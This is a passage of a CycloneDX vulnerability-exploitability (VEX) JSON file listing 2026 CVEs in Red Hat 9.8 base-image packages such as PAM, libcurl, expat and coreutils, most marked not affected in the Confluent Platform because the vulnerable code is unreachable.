          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54411"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54411"
        },
        {
          "url": "https://bugzilla.redhat.com/2488766"
        },
        {
          "url": "https://cwe.mitre.org/data/definitions/208.html"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56131.html"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/libpam/include/pam_inline.h"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/modules/pam_userdb/pam_userdb.c#L327"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56131.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54411"
        }
      ],
      "published": "2026-06-14T18:17:20+00:00",
      "updated": "2026-08-10T12:17:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.5.1-28.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5545",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        613
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo an authenticated HTTP(S) request after a Negotiate-authenticated one, when\nboth use the same host.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials.\n\nAn application that first uses Negotiate authentication to a server with\n`user1:password1` and then does another operation to the same server asking\nfor any authentication method but for `user2:password2` (while the previous\nconnection is still alive) - the second request gets confused and wrongly\nreuses the same connection and sends the new request over that connection\nthinking it uses a mix of user1's and user2's credentials when it is in fact\nstill using the connection authenticated for user1...",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5545"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5545"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-6g7g-56fm-f8mp"
        },
        {
          "url": "https://hackerone.com/reports/3642555"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56132",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        821
      ],
      "description": "In libexpat before 2.8.2, there is a heap-based buffer overflow in doProlog in xmlparse.c because scaffold backing array reallocation is mishandled when there is data-structure sharing across parsers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56132"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1272"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56132"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56132"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56391",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU coreutils uniq is vulnerable to an out\u2011of\u2011bounds read due to incorrect handling of multibyte input when the -w (--check-chars) option is used. The find_field() function miscalculates the byte length of characters by repeatedly processing a fixed pointer instead of advancing through the input, resulting in an inflated length value. \nThis incorrect length is later used in a memcmp operation, causing reads beyond the allocated buffer when processing crafted multibyte input.\n\nWhen running GNU coreutils uniq with attacker-provided arguments, this behavior leads to a crash and potential adjacent heap memory exposure.\n\n\nThis issue has been fixed in the commit d64e35a8a4c0e4608321433e0d84d917e4e36371.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56391"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56391"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=d64e35a8a4c0e4608321433e0d84d917e4e36371"
        },
        {
          "url": "https://github.com/advisories/GHSA-7xvj-m9x7-qgxq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56391"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56391"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "8.32-41.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56392",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU coreutils unexpand is vulnerable to a heap-based buffer overflow due to an integer overflow during buffer allocation when processing large tab stop (-t) values. The multiplication used to calculate the allocation size can wrap around, resulting in an undersized buffer.\nWhen processing crafted input, subsequent writes exceed the allocated memory, leading to an out\u2011of\u2011bounds heap write.\n\nWhen running GNU coreutils unexpand with attacker-provided large tab stop (-t) arguments, this behavior leads to a crash and potentially achieve a heap write primitive depending on memory layout.\n\n\n\n\n\n\n\n\n\n\nThis issue has been fixed in the commit b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56392"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56392"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
